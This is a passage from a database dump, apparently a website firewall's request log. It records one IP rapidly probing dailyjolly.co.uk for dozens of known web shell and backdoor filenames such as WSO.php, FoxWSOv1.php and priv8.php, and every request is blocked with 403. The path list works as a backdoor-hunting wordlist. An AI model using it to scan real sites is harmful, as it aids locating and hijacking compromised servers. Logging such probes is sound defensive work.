3.5.30729)\"}','nePBWIoL17aMOq4pdHYSuEC2',0,1674458748.8545,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LRaxO6jVUmTN8q1tPI5fX40Z',0,1674458749.7411,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','naIKDHJbqpBUxP54A27LrQcw',0,1674458750.6424,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QRv8CjNkVHEWaTqz9yLm27FG',0,1674458751.5233,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1TAv3Qehpg5RED9ClxtLZbod',0,1674458752.4205,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4d7fE9wN6il13U0RhMrCyQvu',0,1674458753.3221,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RK7vs1AMiDXGc0ZQf46oPrqE',0,1674458754.1953,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qyS79P0m2lDCMYb1BnFgZrvt',0,1674458755.0688,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','evrOMgLQZwqBfNpH6VTn715W',0,1674458755.9402,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','r0ZTlOaKbNk2sIYLEhF319nV',0,1674458756.8171,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZbuEmawWTxqkScnev3RPs6JK',0,1674458757.6900,217,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fuxHcPjZgeh5zXyr9toBA0Y2',0,1674458758.8440,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3oZR0zKwYqd6CLDErun8cjMe',0,1674458759.9270,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NXvPak3Qif4UTLleznExSrRK',0,1674458760.8282,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AjlGMIK3zceOdy50kw14htTX',0,1674458761.7159,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8iByUKcf3eXVdsMF9SxrOnEz',0,1674458762.5590,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1xVNvw34Km9nkSLWeaGDpTQl',0,1674458763.4245,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HjkRTtLZ5gVwcxdn3pCzrMam',0,1674458764.2974,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FqdA95Wts3gIMumweDRXlj8L',0,1674458765.1858,219,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7S2lZyVnEcqk40Csu8YDpBOb',0,1674458766.1353,197,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xIzSqlXDRhAoB10nrM7jCfkt',0,1674458767.0370,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o2qKpyj4MNI3rxtHCZv7F9S8',0,1674458767.9128,162,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','d78XOxk0GhZoTYlMwuIA1Hzt',0,1674458768.7815,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Bj4Itko5dnFVg8OmhlDQUEvK',0,1674458769.6424,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YXc04RqFJHv5wxEUQ2np8eL3',0,1674458770.5588,160,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','keiTLJNH57lImRUvjbPz6BVp',0,1674458771.4430,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UamuzpN27IyePWGOEF8Xk36s',0,1674458772.3268,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZNMUKdBLoXhY2FJl0rtaQipu',0,1674458773.2273,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yjRCShsgeVrMm7lfwpb6LIKt',0,1674458774.1291,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FRwrt0PzCZaLED2uGsgiyj3U',0,1674458775.0099,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iIXyQsD8rV6GzNBPMFJYSTah',0,1674458775.9097,202,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LFl3Ew8S6ou0jrVt19YUBnMf',0,1674458776.8297,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TOoCm6MtVShup9Nzxd7gUB8s',0,1674458777.7189,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CXkaqAT3E0b965FJoS1iBNhd',0,1674458778.5847,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pGNrfMChyt0DUXlvZoA16dWJ',0,1674458779.4847,214,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uGSnxzaYDi0v9FEPsQyAwBOI',0,1674458780.4157,175,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cwrbXfEZ9oPiTp6Jj83aHth0',0,1674458781.3093,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','v6tyKfjo7E3TO0xNpDqCRukb',0,1674458782.2019,197,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hNbcKGEpJIoRDtygMCzPY2Ui',0,1674458783.1133,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RWYCeAHVNw3sk0TyB71KqnX8',0,1674458784.0199,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ibKdW8tj9ETUZ705XnrFv1BL',0,1674458784.9010,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3AgZMB9C5xItmNVKkR6D0ud8',0,1674458785.7641,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xUd2QKFmP8vR7Xc49twMhyuf',0,1674458786.6450,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ReF4UpoSvCQz2H1JKPmayZc0',0,1674458787.5175,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HacisKOwkBFt4dxqYL97D1le',0,1674458788.3828,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EkXHCR3l9pZQtLusn0ge1WwO',0,1674458789.2915,199,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UD4wjSBtTFVKAoInymiHaXMx',0,1674458790.2083,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vTuhM10Gre37aoyDZkmg2jbn',0,1674458791.0740,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zNbG0WdD4hVonlkCf9Mm5Sep',0,1674458791.9605,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bWlxAFTN6BMy3GgIsDOeikp4',0,1674458792.8495,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Zp0K8z4Ch6dnxRuBMEA9mvqb',0,1674458793.7296,240,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E2Fc7bqBIg91Altn0vuHMRzS',0,1674458794.7063,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BAMLc72wGbQxRTIZ3mlsUyXv',0,1674458795.6312,220,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VUTBtxSAJ0jfi8uLbp6yYHDW',0,1674458796.5717,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SGEPQT7bK0gpZfo1Ia3ckOi5',0,1674458797.4677,160,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VGIFi1ME6q2gZkUd408pu5On',0,1674458798.3351,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9RgshWq0yK7XPULYQG2Verpo',0,1674458799.2112,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Vr3K9mHUQylj86AMvLwEu5Gf',0,1674458800.0960,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZpNbRIC1LVy84Xav6KjwxTmS',0,1674458800.9780,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nUGMaTs45BIcP9LefXJQilvy',0,1674458801.8837,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','z0CZ6P48JpohgTEeWRsNaYVH',0,1674458802.7685,156,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iVONgtIXjGl1vDbsS9HQdxZk',0,1674458803.6543,188,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vK8lpXPC2ItVsqObxn3SJyAH',0,1674458804.5477,198,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ImZMFRBYNcsy2WdVH7K0a3Aj',0,1674458805.4402,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b1RqzgHpN2JuI4VstUGwxhOj',0,1674458806.3067,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JTXoLxyimKUswtVOdY2AzFMq',0,1674458807.1803,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1F7PYAZ03TfJzgrUBqiDve2j',0,1674458808.1024,229,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','916anSUtxLZDR8vj2W5AmI3P',0,1674458809.0309,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1ukUDmMSX52xEZCzyc7BflrJ',0,1674458809.8901,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8pJnNiIVh31DQxYK2AGuSdzb',0,1674458810.7921,200,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HSNYXq3MIZVzgFyj7OGrL2KP',0,1674458811.6972,195,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lENOwBcKdPM29xnZUiXShJH0',0,1674458812.6026,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','n7Y6vzUPITNbFpiaDVKjqx15',0,1674458813.5265,225,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3LMS8WRngF9ybfEqokdO7sYe',0,1674458814.4764,202,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1gxbtNTjAsqrOUE6m2kuZGp4',0,1674458815.3802,189,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iQktwL4O3vcrWyZnXVFaJ6RI',0,1674458816.2688,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','twZx8BsHKNcYlMLWaqi5Og3R',0,1674458817.1489,185,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','A3ShKeqlnJzkdvpQPisbEcrC',0,1674458818.0276,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gzTuaEkdofZjrUDP9mle2cKG',0,1674458818.9166,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3F7HyK6mCENWG2RatMYq5Io1',0,1674458819.8110,183,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 